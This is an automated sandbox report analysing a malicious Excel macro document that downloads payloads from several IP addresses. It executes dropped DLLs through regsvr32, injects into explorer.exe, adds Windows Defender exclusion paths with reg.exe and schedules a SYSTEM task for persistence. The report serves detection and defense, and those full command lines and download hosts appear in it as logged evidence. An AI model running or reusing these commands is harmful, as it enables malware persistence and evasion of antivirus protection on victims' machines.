    Source: global trafficHTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 23_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 23_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 23_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 23_2_00094FC0
    Source: Claim-838392655-09242021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Claim-838392655-09242021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Claim-838392655-09242021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-838392655-09242021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-838392655-09242021.xlsOLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: Fiosa2.der.23.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.8.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.17.drStatic PE information: No import functions for PE file found
    Source: Fiosa1.der.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
    Source: Claim-838392655-09242021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: 44466.4649013889[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44466.4649013889[2].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa1.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44466.4649013889[3].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Claim-838392655-09242021.xlsReversingLabs: Detection: 26%
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................h.4..........&`.....(.P.....$.......d.................................................................................4.....
    Source: C:\Windows\System32\reg.exeConsole Write: ................T...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........!.....N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF640.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/11@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Claim-838392655-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{F85A5564-6426-431B-8FD7-40D6BA7A0742}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{8104B8A2-C368-4EFF-95B0-548F91E45474}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{F85A5564-6426-431B-8FD7-40D6BA7A0742}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{4A0245B3-5BF6-4A12-A3B4-3B388E7369A5}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{8104B8A2-C368-4EFF-95B0-548F91E45474}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{4A0245B3-5BF6-4A12-A3B4-3B388E7369A5}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000A51A FindResourceA,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.522715533.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.576566085.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0009A00E push ebx; ret
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0009D485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0009D4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00099D5C push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00099E5E push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0009BB29 push esi; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: Fiosa2.der.23.drStatic PE information: real checksum: 0x7fed4 should be: 0x816c9
    Source: Fiosa.der.8.drStatic PE information: real checksum: 0x7fed4 should be: 0x101479
    Source: Fiosa.der.17.drStatic PE information: real checksum: 0x7fed4 should be: 0x816c9
    Source: Fiosa1.der.14.drStatic PE information: real checksum: 0x7fed4 should be: 0x816c9

    Persistence and Installation Behavior:

    barindex
    Uses cmd line tools excessively to alter registry or file dataShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2592 base: 9C102D value: E9 BA 4C 6C FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 3060 base: 9C102D value: E9 BA 4C 6C FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 536 base: 9C102D value: E9 BA 4C 6C FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2100 base: 9C102D value: E9 BA 4C 6C FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: Claim-838392655-09242021.xlsStream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1960Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2984Thread sleep count: 46 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2616Thread sleep time: -148000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2944Thread sleep count: 49 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 1308Thread sleep count: 82 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2420Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 788Thread sleep time: -116000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 572Thread sleep count: 57 > 30
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].datJump to dropped file
